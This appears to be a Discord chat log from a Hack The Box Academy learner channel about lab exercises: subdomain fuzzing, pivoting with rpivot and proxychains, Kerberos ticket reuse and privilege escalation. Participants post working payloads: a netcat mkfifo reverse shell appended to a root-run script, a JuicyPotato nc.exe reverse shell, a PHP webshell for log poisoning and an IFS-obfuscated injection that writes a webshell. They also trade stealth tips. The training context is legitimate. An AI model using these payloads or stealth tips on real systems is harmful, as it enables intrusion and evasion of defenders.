pretty much what i did

INFORMATION GATHERING - WEB EDITION Skills Assessment
What is the API key in the hidden admin directory that you have discovered on the target system?

pasted line by line

so what's the problem

maybe along the way i've managed to customise my instance in a wierd way

thankfully i've managed to install from source

./configure make make install

I mean if you say it doesn't work and don't explain why it's not gonna help the next person

true

one sec

pyenv install 2.7

that is indeed a question in that section

pyenv install 2.7; failed with errors, complained about not having been built with certain modules, specifically readline and some others

@next bronze can u please check the picture i posted, ive even tried the module given curl commands syntax with modified ip's obviously but still didnt work

that's fine, just carry on

haven't done that module yet sorry mate

i did

this then pyenv shell 2.7 reports something like 2.7 not installed

sir what you mean i did'nt find hidden admin directory i just need hinits to find it please

I believe my particular issue stems from already having a python environment setup

pyenv should override that

indeed, but mine actually failed to install python2.7

i'll try again for laughs

if you're not already in an env it should work

have you found more subdomains?

the top of that section lists the things you should try:
Analysing robots.txt
Performing subdomain bruteforcing
Crawling and analysing results

when u say in an env. do u mean in the folder where my env is?

no as long as it's not activated

mmm mine is activated

since i used pyenv to setup my own environment

so i have ./pythontools/bin/python etc.

deactivate it then, just deactivate

ImportError: No module named _ssl
ERROR: The Python ssl extension was not compiled. Missing the OpenSSL lib?

Please consult to the Wiki page to fix the problem.
https://github.com/pyenv/pyenv/wiki/Common-build-problems

BUILD FAILED (Debian 6.0 using python-build 2.4.8)

for my case i will just use my compiled versions of python2.7

good enough for my purpose

and in fact of course i have a bunch of PATH definitions for pyenv in my bashrc already

oh I guess you're missing a core library

how do you not have openssl installed tho

can anyone help me
Enumerate the server carefully and find the flag.txt file. Submit the contents of this file as the answer.

module/112/section/1078

I scanned with nmap and taken ports
21/tcp open ftp
22/tcp open ssh
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be💿31:24:7c:a1:4e🆎84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60🆎cf:10:99💿6c:a7 (ED25519)
53/tcp open domain
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
2121/tcp open ccproxy-ftp

so what cann i do

i do have openssl installed

i think it's that it kind find libs perhaps cos of the path definitions in bashrc

yep idk about that, openssl is usually always present

i definitely have openssl

it's one of those things that will bite me at some point but right now i'll leave it alone

connection refuse sir i did'nt find gobuster vhost -u http://inlanefreight.htb:30514 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

──╼ $openssl help
help:

Standard commands
asn1parse ca ciphers cmp
cms crl crl2pkcs7 dgst

etc.

it's installed in your system but python doesn't have that module

with gobuster i did'nt find any thing is possible to tell me other hinits please

you're doing 2 things wrong, check the Virtual Hosts section

https://academy.hackthebox.com/module/147/section/1657

I am not getting an NTLM hash, I get aes256 which crackstation cant crack. what do I do?

there should be another one iirc

as I said there should be another ticket where you can get the hash from, and please don't post spoiler screenshots

okay

what am I missing? tried both methods of checking the scripts and klist

Uncommon port

@fathom pendant can you help please?

Just look around

Also don't directly @ me I didn't chime in bc xreous was already helping

Wrong channel

sorry.

yes just look around, there's another ticket

Is it boxes?

im getting crazy in the SocksOverRDP section

2121 ?

Bingo

Yes

RDP is just so slow

Thanks!

got it thanks!

Anyone else just feel a bit overwhelmed by the documentation module. dont even know where to start

I mean, ideally you start from the beginning

i uploaded a shell.php file, it keeps loading until the site crashes, what can i do?

Module: getting started
initial foothold

do i have to metasploit it first?

sir this my /etc/hosts
127.0.1.1 debian12-parrot

The following lines are desirable for IPv6 capable hosts

::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 localhost
127.0.1.1 htb-mh4uqekvis htb-mh4uqekvis.htb-cloud.com
94.237.49.212 inlanefreight.htb

If you're using a listener, it'll keep loading until you close the listener

Im not using a listener at the moment but it never did tell me to use it in the module

So your issue is with the upload?

yeah i uploaded it and clicked save changes

It shouldn't crash on a simple php file

and then it just starts loading infinitvely

well make sure the target is still up

now this happened to it whilst i was doing it

I'd say reset it, try again

Change vpn regions

i've tried it last night aswell

Hmm

Odd

Reach out to support then

sir my target is up

then deploy the techniques you have learned in the module pls bud, I'm not here to guide you on every step

hmm rpivot is confusing me

I am doing the "Web Server pivoting with rpivot" section in the Pivoting and Tunnelling module

in fact rpivot is kicking my ass

so. python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0 run on the attack host sets up the attack host as a reverse pivot

then python2.7 client.py --server-ip 10.10.14.18 --server-port 9999 makes a connection back from the intermediate compromised host back to our attack host or the rpivot server

we add socks4 127.0.0.1 9050 to proxychains.conf

and then we expect that proxychains firefox-esr <IPaddressofTargetWebServer>:80 where <IPaddressofTargetWebServer> is the actual internal IP (172.16.5.135) run from the attack host will give access to the internal target

but how will proxychains know that traffic to 172.16.5.0/23 is to be sent via the rpivot

rpivot listens on SOCKS and you redirect traffic to that port via proxychains

ok

ok

makes sense

then what i'm doing should work

──╼ $python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 New connection from host 10.129.202.64, source port 47350

i run the client on the intermediate host i spawned

connection is up

i got it

i tried curl and it downloads the page

but trying to access the webpage by running firefox via proxychains doesn't work

try using firefox proxy settings rather than proxychains

add the SOCKS proxy there

I just did a listener, didnt get my reverse shell, how do i know which port i should be using actually, cause im using the correct ip address

bro like it's so dumb i've set my parameters up

and it can't even exploit it

the version of it is correct also

i am having the same issue too

my target died suddenly

i respanwed it, but now I can no longer access the http page

i cannot connect to it with pwnbox either after stopping the vpn on the vm

I dont know what's going on with that module, im just trying to do it cause i've skipped, and the problem is im literally not getting my shell at all, even with the attempt of metasploit, and file uploading, i dont get my shell at all

i've watched some videos about obtaining a shell i've applied the same principles and nothing i dont get it

no I meant it may not be related to a module specifically, but a more general issue

credentials for the exploit has been set and so has the targeturi

and im using the 2nd one on the metasploit list.

guys just one question for targets with public IPs like 94.237.50.19:54111, do we even require VPN ?

cool we actually don't

hello, i am on virtual host and i having issues again solving the first task.

i entered this gobuster vhost -u http://<IP_address of my spawned machine> -w <wordlist_file> --append-domain but i am not getting any output

Goddam... why didn't I think of that

Try it when I get back in front of computer

Thx 4 the hint

I have question regarding LFI module, skil assessment

||I am the last step where I have to poison/var/log/nginx/access.log. I change the user agent to <?php system($_GET['cmd']); ?>.

But then when I navigate to /ilf_admin/index.php?log=../../../../../../../../../../var/log/nginx/access.log&cmd=ls / I only get the log output back, no comand execution. I set the user agent through both burp and dev tools, still no luck. I confimred that when I change it to "poison" the user agent appears changed to that in the logs, but when I change it to the webshell it just appears as " ". Anyone got a clue of what I could be doing wrong ? ||

nvm I got it after resetting the box, this happened during the a previous exercise with log pollution too

Hi guys

need some help on INFORMATION GATHERING - WEB EDITION
Skills Assessment

Anyone has any idea why Log Poisoning/Pollution is so finicky ? Is it just the HTB environment, or is it the same in real life ?

a good practice would be to proxying your gobuster to burpsuite and see what you are actually sending to the target
but you can try with
gobuster vhost -u http://<IP_address:port> -w <wordlist_file> --append-domain --domain <domain-name>

or you add the ip without the port in /etc/hosts file like ip domain-name and then
gobuster vhost -u http://<domain-name:port> -w <wordlist_file> --append-domain

i had the same issue. it seems messing around does break the logs, then restarting the target and directly the correct command, it works. don't know why tho

thanks, good to know it was not just me

yeah... not very practical if that happen in real life where you can't respawn the target

any one ?

just ask you question, if someone can answer they will

we close chat

how can i crawl something that ain't have any sub links on it?
||After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb.||
depending on the previous question:
|| What is the API key the inlanefreight.htb developers will be changing too?||

at the beginning of the skill assessment there is a bullet list with things to do, check if there is anything there you haven't done yet

Have been stuck on this
Can't enumerate the username at all via brute force or exploration.
Valid username filter "Invalid credentials."
Invalid username filter "Unknown username or password."
Used xato 10 million and names.txt both from SecLists.

Cookie's are PHPSESSID and aren't exploitable.

Profile.php can't be accessed by modifying the status code or anything.
And 2fa.php won't work with any registered user.
https://academy.hackthebox.com/module/80/section/848

Can anybody else me figure out why EternalBlue is failing on Shells & Payloads - Infiltrating Windows? I've tried using reverse_tcp, reverse_http, doing set DefangedMode false, set GroomAllocations 10, and set GroomDelta 5 but keep failing at triggering the free of corrupted buffer.
I've run into this issue before w/ HTB, but last time reverse_http worked

the course use ms17_010_psexec, iirc it should work pretty much out of the box

In the Linux Fundamentals course Containerization Module, we were suggested to practice LXC. I have learned how to set up an unprivileged container, however, the second task to configure network settings for the container confuses me. What exactly am I supposed to config in the network settings?

this is the error I am getting, what do I do? I imported the ccache file...

module https://academy.hackthebox.com/module/147/section/1657

still nothing usefull

I think I had this problem when doing this lab, what I did was read the ccache, base64, transport to my kali and use impacket

oh okay.

psexec worked out of the box - thanks!

man I am unable to even get it transferred any way to do it right inside that svc session

need some help on INFORMATION GATHERING - WEB EDITION
Skills Assessment
can't find any useful data on robots
||After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb.||
||What is the API key the inlanefreight.htb developers will be changing too?||

send ss. of whatever youve found

ss ?

screenshot

I don't remember this module do you get access to the server via ssh?

I have root on the machine. but smbclient isnt working.
question is: + Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.

I imported the ticket but smbclient isnt working properly

smbclient from impacket?

smbclient.py <domain>/<username>@<ip> -k -no-pass

the hint I can give you is to first fuzz vhosts with gobuster and then use reconspider.

idk lol. the smbclient on the machine. wait

then its not the impacket one, impacket is a .py collection of scripts do interact with a lot of services on AD, smb is one of those

I see

What I did was get the ticket, transfer to my kali host, export KRB5CCNAME=./<ticket> ran the smbclient.py using proxychains since you cannot talk to the dc directly

how did you transfer it? I tried via python httpserver but it isnt working.

I will start the machine here and try to do without impacket

cat the ccache file, pipe to base64, grab the output and decode on your machine

or scp since ssh is enabled on that machine

oh scp

already found the ||1337 ||subdomain then when i browsed to the ||robots ||endpoint, i found the ||admin|| endpoint and i got the flag, now the last 2 flags im stuck on it, reconspider result nothing

uh did you cat the result file? or add the port to the url when u ran reconspider?

you will find one more subdomain, add this one to hosts and fuzz again

hey could someone help me with the linux priveledge escalation module, the logrotate part?

there is another subdomain, gobuster again on this one

what wordlist should i use then ? there is no hint for that

@north bramble

worked for me

maybe you got the wrong ccache file, on mine there was two files related to julio at the /tmp dir, grab the one with the bigger file size

oh ok wait

for example I grabbed the last one

I dont have this one

bruh wait

yeah it will not be the same, but similar, do a ls and show me a print from the output

grab the one that end with xK

here

this one have a bigger file size

export KRB5CCNAME=./<ticket_name> if you are inside /tmp, then smbclient //dc01/C$ -k -c ls -no-pass

okay let me try this

try the other one

I am resetting the machine

try the other ticket, if this not work then reset

question idk if its the lab or me :). question 3: What is the API key in the hidden admin directory that you have discovered on the target system? on the skills assessment for INFORMATION GATHERING - WEB EDITION. I am getting this.

I am resetting this lmao

ok

did you get the rest of the questions?

yeah, i got the first 2

thanks @north bramble , now 100% on Penetration Tester job path and i'm ready to enter the exam ❤️

woah great. I am at 51% a couple months back. I started from 0. this is my 3rd week.

Nice work.

strange, you SHOULD get a subdomain. did you add that inlanefreifht one to hosts file? send your etc hosts ss

screenshot*

yeah i did that. check it out.

yeah its really strange

reset the machine once. you seem right

ok sounds good ill do that thanks

literally got the same 2 tickets 😂

same error?

MODULE: WINDOWS PRIVILEGE ESCALATION
SECTION: Skills Assessment - Part I

transfered juicy potato and nc.exe on the target. when running jp.exe with this command ./jp.exe -l 5555 -p c:\windows\system32\cmd.exe -a "/c ./nc.exe 10.10.15.146 4444 -e ./cmd.exe" -t *, getting this error

COM -> recv failed with error: 10038```

any ideas?

same 2 tickets, 1406 and 1414 bytes. resetting again

looks like it should work now lets see

same error, vastly different files. ima try the other one

Okay this isnt working at all.

frens please help if yall can

Module: API attacks
Section: Broken Object Level Authorization

What kind of answer do they want from me here?

The flag.

What do they mean with the flag (i might be stupid here)

exploit a BOLA and you shall find it

it sticks out like a sore thumb

this assessment gave me a seizure

fucking triple subdomain dumbfuckery

I feel like I have it but it is still wrong

Can I get some more guidance because I'm so lost at this point

okay so

https://academy.hackthebox.com/module/134/section/1175 this module right here, the curl -i -X command reveals nothing on what commands are able to be used. i literally had to go find a writeup on this to use a command that wasnt even fuckin mentioned to get the flag. like cmon dude

this isnt working.

ERROR:
root@linux01:~# smbclient //DC01/julio -k -c ls
gensec_spnego_client_negTokenInit_step: Could not find a suitable mechtype in NEG_TOKEN_INIT
session setup failed: NT_STATUS_INVALID_PARAMETER

I am off to sleep so if anyone can help, please tag or dm me. thanks

Any recommendations?

Not understanding why the net cat listener isn't working here for the pentestermonkey.php file I upload to the weblink(http://94.237.59.193:47722/):

https://academy.hackthebox.com/module/136/section/1261

"Try to exploit the upload feature to upload a web shell and get the content of /flag.txt "

I use the local IP address of my attacking machine and the port number in my php file is the same port number I used for my net cat listenere address:

we do not offer crypto help

Hey im going back through the finding evil mini lab inside of the soc analyst path. I am creating an XML query to find something. Regardless I was able to find it the long way however after I did it I was trying to figure out a faster way to do it and I made the query <QueryList>
<Query Id="0" Path="Security">
<Select Path="Security">
*[System[(EventID='4907')]]
and
*[EventData[Data[@Name='SubjectUserName']='0x3E7']]
and
*[EventData[Data[@Name='ObjectName']='C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\wpfgfx_v0400.dll']]
</Select>
</Query>
</QueryList>

Whenever I run it, it finds nothing even though I was able to manually find the log without the object name eventdata.

Can someone please explain to me if i wrote the query wrong or does that not just work? it didnt give me an error message

https://academy.hackthebox.com/module/15/section/453

hi guys how are you all i am new in cypersecurity and start with this section above

what "Docker target or VM target(s)." mean ??

Technique: password spraying AD
Tools: kerbrute = fail; cme=success --> is this usual because of different protocols used by the tools? Or should work both?

Has anybody had issues with the Introduction To Splunk & SPL. Im having issues where no searches even ones included in the module show no results. i do have time set to "All-Time" am i being dumb and missing something or is my pwn box bugged

Docker is a containerization software to allow containers of various services. VM stands for virtual machines which can be stored in a container like Docker. Typically VMs are used to virtualize other OS's like Kali linux on top of your base OS.

Docker target = public
Vm target = private amd need vpn to access if on your own machine

He was asking in context of htb

didnt know thought he meant in general 🙂

i got it guys

He explicitly said "docker target and vm target"

https://tenor.com/view/thumbs-up-double-thumbs-up-like-agreed-yup-gif-14284264219182206721

look
now i finish the intro to academy in the next step section he told me to start with Information Security Foundations path it cost 190 cubes so i should to learn another module to make 190 cubes so what should i do in this situation what the module should learn it ?

Its honestly a toss up. my current issue is that a lot of the beginner stuff is boring to me because i am a college student and have experience with a lot of the tools stated. I would recommend to just do what interests you to stack up cubes.

You don't spend those cubes all at once when you sub to a path

The infosec Foundations path is filled with t0 modules which all give back 10 cubes on completion

Note, you will never go positive on cubes for free

t0 modules give back 100%, but all other modules 20%

You can't go net positive in cubes without paying

If you have the student sub you do earn the cubes still from completing

Ahh i see didnt know that

It wouldn't make sense if you could

Since htb is a paid learning platform

The t0 modules are considered "free"

yeah i know all that but i don't know what i should to do

i search on google and chat gpt about how i can be bug bounty hunter and he told me to start with networking with ejptv 1 i will learn the offensive security in it and the networking and in htb there is a lot of path that's make me struggle like i have a lot of option what do you think start with ejptv1 ?

hmm thats odd

mine there are 2 tickets, one does not work the same error as yours, but one of them works, try what I said then use impacket

The cbbh path is structured to be done in order

That's intentional btw

One is expired the other should be active

I imagined, but its strange that the same commands works on my instance and for the other guy not

I think the first time I did this module back on 2023 I had this problem using smbclient did everything using impacket

It's also a weird bug with some regions spawning an invalid ticket

so ? what the next step i should to do what do you do if you were my place

There's a networking fundamentals module in htb.

And the information Security Foundations path

ok there is a two paths start with any one ?

makes sense

EU doesn't have that problem

Foundations will get you use to linux and windows terminals

so i must start with information security foundation path

and what do you think about ejptv 1 learn it now with ecurity foundation path or keep it in another time ?

I haven't done it so i couldn't tell you

Just take it one step at a time tbh

@fathom pendant why no?

Because it wouldn't be the same file

Not to mention in a real engagement you don't want to outright replace a file

What do you mean? I am going to create a new file called monitor.sh and put reverse shell code in there

and backup the original monitor.sh file

You can just add it to the bottom

You don't need to replace the file

well i would say method would work in both ways

I thought about that, top or bottom, either would be fine. Or both methods would work.

Yes but general practice vs just yolo

Bottom makes it less likely to be seen when another users runs it

Oh, right.

And checks

You have to hide also.

u dont really care abt it
but bottom is standard

Good point. Stealth.

No one will notice one line maybe

but they will notice a backup file

Also plenty of commands to append to the bottom of a file

something like "string here" >> file.txt
will append "string here" at the bottom of file.txt

Good points.. approach tasks not just to solve, but as if it were a real engagement

I am doing that

I'm taking notes for the task and created a whole folder for it

back them up as well
i lost some of mine

I did last night

Now they're on git

┌──(stoned㉿kali)-[~/Notes/Exercises]
└─$ tree                
.
└── Nibbles
    ├── EPT
    │   ├── Discovery.md
    │   ├── evidence
    │   │   ├── credentials
    │   │   ├── data
    │   │   └── screenshots
    │   ├── logs
    │   ├── scans
    │   │   ├── nibbles.gnmap
    │   │   ├── nibbles.nmap
    │   │   └── nibbles.xml
    │   ├── scope
    │   └── tools
    │       ├── LinEnum.sh
    │       ├── exploit.php
    │       └── php-reverse-shell.php
    └── IPT
        ├── evidence
        │   ├── credentials
        │   ├── data
        │   └── screenshots
        ├── logs
        ├── scans
        ├── scope
        └── tools

20 directories, 7 files

I create the same folder structure for every project, task, and use the Externel PT folder to store their data, notes, findings, etc. etc. nmap scans

I like to organize as I do things.

https://git.stoned.io/hash/SecNotes here are my notes

Careful keeping your notes on a public repo

As modules above tier0 explicitly deny sharing a lot of info about their contents

Oh

Content policy and whatnot

Now it's private repo

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|cmd -i 2>&1|nc 10.10.x.x 444 >/tmp/f

I use my tun0 ip and put this line at the bottom of monitor.sh

Then as nibbler, I do, sudo ./monitor.sh and I get errors, script doesn't run, and netcat listner breaks.

Or perhaps instead of a bash reverse shell, I can try to tell the monitor.sh scrip to use python to spawn a root shell.

yup, that was it. 😄

I got root

Thanks a lot folks

Or just have it run /bin/bash -i

Or that, cool. Thanks

Also you're listening on port 444?

I was using 443 already

Generally you want to avoid running nc with sudo where possible

I should have used a more stealthier port

Why is that?

And if you need to use common alts, 8000 -- 8080

I use 443 mostly as it's most inconspicious

Opening ports as root is generally not a good idea

Except when the logs show there was no TLS negotiation

if someone is monitoring connections, which they do, 443 wouldn't stand out as much

True

80 would be better

Good idea

443 for socat encrypted shells

Either way, it works

Hey guys!

Need some help!

I'm sending this following payload via URL

||bash<<<$(base64${IFS}d<<<ZWNobyAtbiAiPD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4iID4gYmJiLnBocA==)||

The payload is supposed to execute the following command

||echo -n "<?php echo system($_GET['cmd']); ?>" > bbb.php||

But for any reason I still didn´t figure out why the content of the file bbb.php is the following:

<?php echo system(['cmd']); ?> instead of <?php echo system($_GET['cmd']); ?> (without $_GET...)

Any ideas. I feel I'm missing somethign...don´t recall what it that...

Thanks

probably due to how the payload is being encoded and then interpreted

$_ is a special variable in bash that holds the last argument of the previous command, so it's interpreting your code using that variable instead of the literal string

Use single quotes for echo

And double around cmd

I am following the module but I am getting the follow issue with starting the socks proxy server:

[*] Starting the SOCKS proxy server
[*] Stopping the SOCKS proxy server

Any reason why?

Definitely not enough info

i'm sure there's a reason but you don't provide info to tell us why

I'm following the module with every step outlined here: https://academy.hackthebox.com/module/163/section/1551
"The Double Pivot - MGMT0" but when setting up the proxy in socks in msfconsole it stops the proxy server

When I did it the first time it work but now it's giving me this error and I have no idea why

did you restart the target afterwards? if not, it could be that the port is in use already from the previous time you did it

port was already in use which kill the ps and it fixed it

https://academy.hackthebox.com/module/77/section/859

I am doing this task. I got as far as finding the admin password and logging in. Now when I try to upload image or file, it uses swf object to upload and when I click upload files, nothing happens in firefox. Haha. No SWF/flash stuff anymore. Now I don't know how else to upload files.

I was able to use msfconsole. But not manually yet.

I got as far as launching php as root, but I can't seem to launch a shell using php...

pls someone hlp me, am doing info gathering web edition and am stuck on the last 3 questions of the skills assessment, i cant find out what to do and this is the very last thing i have b4 finishing the cbbh path?

root@gettingstarted:/var/www/html/theme#
I got it!

Do the things taught in the module

You need to enum vhosts and crawl for info also analyzing robots.txt can be helpful

There's a short list of things that the engagement tells you are needed

but seems like no robots.txt:

─[ineedabetterh4ndl3@parrot]─[~/htb]
└──╼ $curl http://inlanefreight.htb:41983/robots.txt
<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.26.1</center>
</body>
</html>

Then dig deeper, vhost enumeration

It's one of the techniques discussed in the module

ok

wait a sec

i feel like i asked u about this same q about month ago

will check discord history

Which is when you should have been able to complete it

There's absolutely no way you can't get the answer if you've done the rest of the module fully

Hey guys I am wondering for anyone who used sqlmap, how do u choose which tamper script to use? Do u just use each one separately and see if any work?

Basically, yeah, though for the sqlmap module they call out a specific tamper script

see

Yeah

i have

And i told you the ffuf syntax for vhost fuzzing

let me keep trying

yes ik will do now

And the gobuster syntax

ik

that day it was bed time when u said so had to sleep and then disided to skip and come back to it later

Should have done it while it was fresh in your mind instead of skipping

ur prob right

but good news is after i finish i will be done with cbbh role path 🙂

am doing now

Always dig deeper if what you find isn't on the surface

am getting nthing, using this: gobuster vhost -u http://94.237.50.180:41983 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain -v -t 500

no subdomains found

and i used very big wordlists

@fathom pendant on this q do u thing they mean directory or subdomain: What is the API key in the hidden admin directory that you have discovered on the target system?

Have been stuck on this
Can't enumerate the username at all via brute force or exploration.
Valid username filter "Invalid credentials."
Invalid username filter "Unknown username or password."
Used xato 10 million and names.txt both from SecLists.

Cookie's are PHPSESSID and aren't exploitable.

Profile.php can't be accessed by modifying the status code or anything.
And 2fa.php won't work with any registered user.
https://academy.hackthebox.com/module/80/section/848

Just a quick question, what can PowerView do that Bloodhound can't in terms of enumeration??

pls @fathom pendant help me with this, ik u have already helped a lot and i thc u but just cant for the life of me solve this skills check, am sooo close to finishing cbbh role path and if i finish today i will take the test in 2 days but if not will not be able to take till next summer (happily perents getting for me, this first attempt is just gonna be for learning about the exam and next summer will do it hoping to pass)

SOMEONE PLS HELP ME THIS CHAL IS SOOO ANOYING AM RAGING WILL SHUT UP SOON JUST SOMEONE HELP ME (the info gathering skills assesment)

What's the question for the assessment that you need help on?

Why are you using an IP address?

and -t 500 will definitely not help

You need to specify the domain name instead of the IP.

Adding more threads is a bad idea btw

Hi all, hoping somebody could give me a hand with the Web Proxies module Proxying Tools step - I'm having some trouble getting Metasploit to proxy through ZAP, anybody mind giving me a hand please?

Screenshot of the suggested module & config below:

I'm running a python uploadserver on that port (12345)

Try: http://127.0.0.1:8080

same thing unfortunately, have tried that as well as caps & no caps on the HTTP too

maybe it is bypassing the proxy because they're both localhost?

You don't have http://127.0.0.1 you just have: http:127.0.0.1:8080

but I've tried targeting the machine from earlier in the module & it also failed

I was trying both http:// & http: see below

It should be http:// if that doesn't work then turn on verbose mode on that module by setting verbose to true

https://forum.hackthebox.com/t/using-web-proxies-proxying-tools/255332/4

that's why I was trying HTTP: without the // but all those options didn't help

rhosts doesn't make sense here

proxies wrong here, rhosts wrong too

so, if the target website (using the machine from earlier in the module) is 94.237.50.19:32304

what values should I have for PROXIES and RHOSTS in your opinion?

like this?

rhosts should be 94.237.50.19 by itself

with this config, same issue

yes

any advice on what it should be set to?

try it without the proxy first. Do you even have one set up?

yep

I just swapped to Burp and it worked immediately

is there an additional step needed in ZAP to have it intercept command-line tools?

dunno, but the issue is with zap then

do not @ people
you can DM me if you didn't get yet.

yeh seems to not work with proxychains either hrmm

ah, you need to manually enable it:
Tools > Options > HTTP Proxy > Enabled

He skipped it a month ago is why I'm mostly just letting him figure it out

Since I told him all the syntax to get what's needed then

proxychains would be using SOCKS

sounds good
👍
maybe he can get it

He keeps fucking up syntax is why he's not getting it, doesn't help he's frustrated bc this is the last set of questions for him to complete the path

Currently doing the tasks for Dynamic Port Forwarding with SSH and SOCKS Tunneling module. Pretty sure I have my dynamic port forward + proxychains config setup correctly. But when I try to nmap the target internal IP, I don't get good results:

$ proxychains nmap -vvv -sT -Pn 172.16.5.19 -p3389
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
...
Scanning 172.16.5.19 [1 port]
Completed Connect Scan at 22:52, 2.00s elapsed (1 total ports)
Nmap scan report for 172.16.5.19
Host is up, received user-set.
Scanned at 2024-07-26 22:52:11 CDT for 2s

PORT     STATE    SERVICE       REASON
3389/tcp filtered ms-wbt-server no-response

$ proxychains nmap -vvv -sT -Pn 172.16.5.19
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
...
Initiating Connect Scan at 22:40
Scanning 172.16.5.19 [1000 ports]
Completed Connect Scan at 22:43, 201.24s elapsed (1000 total ports)
Nmap scan report for 172.16.5.19
Host is up, received user-set.
Scanned at 2024-07-26 22:40:30 CDT for 201s
All 1000 scanned ports on 172.16.5.19 are in ignored states.

but when I rdp directly via proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123 it seems to be working/the port is up. am I missing something on the nmap scan?

Btw @rustic sage each voucher covers 2 attempts

Nmap doesn't like going through proxies

Host is up, received user-set. is really the line you should care about

but I'm trying to replicate this tho, so I was expecting some results:

haven't searched about the host is up, received user-set message but I'll check into it

A lot of that is just proxychains garbage

If you have silent mode turned on for proxychains, it won't show all that

yeah sometimes little mistakes results in big sock
it is up to him to find out

it's telling you that the host is up, so the problem isn't with your proxychains connection

Tbh, it's really trivial.

I wonder how many users bother learning with the tools that the modules use, and how many stick with just one

try the other -sX flags and see what you get

oi[jaesdpohifaiohpsfp9ohrqwiha8sehuopfawiuhjopeuophfgveraopuih9qafweriopuhnwerafeouiphqaerfuophniqrfeeohupqhwuopeffoiuhqfwe

rage... okay. mabye i should try trying harder...

Or just read how the tool works

...which?

Gobuster

Do gobuster --help

ok

Stupid question: how to download parrotOS - cant select anything...

Click download. Then there should be a drop-down?

nope

Did you try refreshing?

doesnt work either...

nothing can be selected

guessing theres something wrong...

change the browser

@spark spruce maybe you can check it out...

It works for me in my mobile browser

Have you tried making other choices?

it works here

ah - amd doesnt work?

strange... arent it?

but thx

JS disabled? Any console errors?

Might be a temporary glitch or so. Which one are you trying to download? I’ll try to fetch a link

Alternatively, go direct to the mirror here and grab the version you want: https://deb.parrot.sh/parrot/iso/6.1/

Even better

@ocean night works fine - thx

#general message
@grand portal , do you not get an IP?

No. It's just loading.

Tried many servers.

Hmmm. That’s odd indeed

Any errors in the console @grand portal ?

In web dev tools?

Yes

Yes. I remember support team saying something similar like " it's working on my end, so yeah face it "

Let me try

Is there something specific i should be looking at?

Just if there are any errors, whether from a request, or from javascript

If in Chrome.. anything red

You can use jam.dev to record it

Shouldn’t contain PII

Or just share a screenshot 🙂

Stuck at this point.

What about going to the Network tab - click the spawn button and look out for the request to https://academy.hackthebox.com/api/spawn/container/247 (assuming you're still on the same module)

What response does it give?

I'm unable to click on spawn button anymore. Whenever I load the page, it's automatically starts with fetching and then target is spawning.. and it never loads.

However I see 247 xhr type response in network tab.

It should have some reoccurring calls in the network tab

What’s the response there if you click on one of those ?

That's happening.

200 OK

Should be able to click any of them and then a few tabs should pop-up. One of them being response

And the content?

app-5aaac70a.js exist under build/assets directry.

huh

Wdym by content?

As in the response from the request

Last thing to try would be to switch VPN servers via https://academy.hackthebox.com/vpn - that should terminate all instances etc connected to your account

That's the first thing I did. It didn't work.

Ok..one moment..

I've sent you a DM

Okay

Right, try again please @grand portal

If you refresh you should see the option to spawn again

I can see an IP has been assigned this time

All good?

Almost. Let me try accessing that IP.

Nice. It works.

Thank you so much.

You're welcome

Was the issue on my end or HACKTHEBOX?

..and sorry, I should have introduced myself in DM first

It looked like a job got stuck somewhere in the HTB back end provisioning service, so nothing to do with you

Yeah. I appreciate helping me out. I wasn't sure who you'd be.

Alright, I'm good to go, Lessgoo learning. I'll go sleep first. Feels lighter.

I am now spawning it with a vpn and its still the same lmao
edit: it somehow worked now

has anybody managed to complete the web proxies capstone using just ZAP?

I did almost all of it with ZAP, but can you be a bit more specific? What are you trying to do

I'm stuck trying to import the Community Scripts addon (I know I could just manually add the 1 script I need for question 3, but I'm frustrated at why I can't get the community scripts to appear in the Scripting tab haha)

Those are my notes:

## Add a custom script to zap (example)
### Install community scripts
- install community scripts addons
- options > Scripts > Load -> `/home/sudo6/.ZAP/community-scripts` -> ok
### Add custom script
- (assuming your script is in a folder under options > Scripts)
- View > show tabs > Scripts Tab > Right Click your script > enable Script
- (eg to-hex.js, because it's not installed by default!!!)

You probably didn't enable the script cf View >...

they're not showing up in that View > Show tabs > Scripts tab is the problem though

it automatically aded the community-scripts directory here when it installed the addon, but they don't show up in the Scripts tab:

the one I'm chasing is to-hex.js it is in that folder but not appearing for some reason?

Maybe I had to add it manually? This is the script content
https://github.com/zaproxy/community-scripts/blob/main/payloadprocessor/to-hex.js you can add it by right clicking on Payload Processor

final question frens. please help. password attacks, pth using linux

cheers, yeh I might just reinstall ZAP and if it still doesn't work then I'll just add this one manually. Thank you!

Module: Password Attacks
Section: Attacking Active Directory & NTDS.dit
Would it be wiser to just use netexec with blank password to check if the account exist? or should I just supply it with a wordlist directly?

supply wordlist and use hint to save time

Not sure…
Which section are you on?

Oooh, idk.
Still pretty much a beginner on HTB.
also trying to get a web shell tho.

Interesting.

bit of a spoilers but you should look into where the script points to

You figure it out?
It’s hard to get help outside of HTB modules in here.
Also your question could maybe use more context?

it's not the one in sysvol

well i guess i'll keep looking but it really feel like no users i got is able to modify it

feels wrong idk

^

